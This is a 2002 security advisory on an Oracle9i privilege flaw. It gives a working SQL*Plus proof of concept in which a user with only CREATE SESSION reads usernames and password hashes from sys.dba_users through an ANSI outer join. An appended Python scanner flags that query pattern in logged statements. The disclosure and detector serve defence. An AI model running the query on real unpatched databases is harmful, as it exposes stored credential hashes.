User Privileges Vulnerability in Oracle9i Database Server
21 Apr. 2002
Summary
A potential security vulnerability has been discovered in Oracle9i database server. A user created in the Oracle9i database server with limited privileges can potentially access privileged data by using the SQL syntax for outer joins. As such, a knowledgeable and malicious user can gain unauthorized access to data in Oracle9i database server.
Credit:
The information has been provided by Pete Finnigan.
Immune systems:
None of the Oracle8i (Release 8.1.x), Oracle8 (Release 8.0.x) or Oracle7 database server releases is affected by this vulnerability.
Oracle 9i includes the new ANSI outer join syntax. Oracle still supports the old syntax, but the new syntax has a serious security issue that allows any user to view any data.
Workarounds:
There are no workarounds to protect against this potential vulnerability.
Patch Information:
Oracle has fixed the potential vulnerability identified above in the upcoming Oracle Database server release, Oracle9i, Release 2. Patches with the base bug fix number, 2121935, are being made available only for supported releases of the Oracle9i database server (Releases 9.0.1.x) on all supported platforms.
Download currently available patches for your platform from Oracle's Worldwide Support web site, Metalink, http://metalink.oracle.com. Activate the "Patches" button to get to the patches Web page. Enter the base bug fix number indicated above and activate the "Submit" button. Please check with Metalink or Oracle Worldwide Support Services periodically for patch availability if the patch for your platform is not yet available.
Example:
SQL> connect / as sysdba
Connected.
SQL> CREATE USER us1 IDENTIFIED BY us11;
User created.
SQL> Grant Create Session to us1;
Grant succeeded.
SQL> connect us1/us11;
Connected.
SQL> select a.username, a.password
2 from sys.dba_users a left outer join sys.dba_users b on
3 b.username = a.username
4 ;
This illustrates that a user with the barest of privileges, i.e. CREATE SESSION, can actually see data in the data dictionary that should not be visible to that user. In this example, we can select the list of usernames and their hashes.
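Since the advisory lists no workaround, unpatched 9.0.1.x systems can at least be reviewed for the pattern shown above. The following is an added example, not part of the original advisory or any Oracle code: it scans captured statements for ANSI outer joins that read schema-qualified objects the session user neither owns nor holds a grant on. The input format, the function names and the sample data are assumptions constructed for illustration; the grant set is assumed to already include privileges the user holds through roles or PUBLIC.

```python
import re

# ANSI outer-join keywords (the syntax new in Oracle9i).
OUTER_JOIN = re.compile(r"\b(?:LEFT|RIGHT|FULL)\s+(?:OUTER\s+)?JOIN\b", re.I)
# A schema-qualified object directly after FROM or JOIN, e.g. "from sys.dba_users a".
TABLE_REF = re.compile(r'\b(?:FROM|JOIN)\s+"?([\w$#]+)"?\s*\.\s*"?([\w$#]+)"?', re.I)
# String literals and comments are removed first so keywords inside them do not match.
NOISE = re.compile(r"'(?:[^']|'')*'|--[^\n]*|/\*.*?\*/", re.S)

def suspicious_refs(user, sql_text, grants):
    """Return sorted OWNER.OBJECT names that `user` reads through an ANSI
    outer join without owning them or holding a grant on them."""
    sql = NOISE.sub(" ", sql_text)
    if not OUTER_JOIN.search(sql):
        return []
    user = user.upper()
    hits = set()
    for owner, obj in TABLE_REF.findall(sql):
        owner, obj = owner.upper(), obj.upper()
        if owner != user and (user, owner, obj) not in grants:
            hits.add(f"{owner}.{obj}")
    return sorted(hits)

def scan(statements, grants):
    """statements: iterable of (user, sql_text). Returns [(USER, [refs])]."""
    findings = []
    for user, sql_text in statements:
        refs = suspicious_refs(user, sql_text, grants)
        if refs:
            findings.append((user.upper(), refs))
    return findings

# Constructed sample input: (session user, statement text) pairs, and the
# object grants each user holds as (GRANTEE, OWNER, OBJECT) tuples.
SAMPLE_GRANTS = {("APP1", "HR", "EMPLOYEES"), ("APP1", "HR", "DEPARTMENTS")}
SAMPLE_STATEMENTS = [
    ("us1", "select a.username, a.password from sys.dba_users a left outer join "
            "sys.dba_users b on b.username = a.username"),
    ("app1", "select e.ename from hr.employees e left join hr.departments d "
             "on d.deptno = e.deptno"),
    ("us1", "select 'left outer join sys.dba_users' from dual"),  # literal only
    ("us1", "select username from sys.dba_users"),  # no ANSI outer join
]

if __name__ == "__main__":
    for user, refs in scan(SAMPLE_STATEMENTS, SAMPLE_GRANTS):
        print(f"{user}: ANSI outer join on ungranted objects {refs}")
```

A finding on an unpatched server means the statement may have returned data the user was never granted, so the exposed objects (here the password hashes in the advisory's example) should be treated as disclosed.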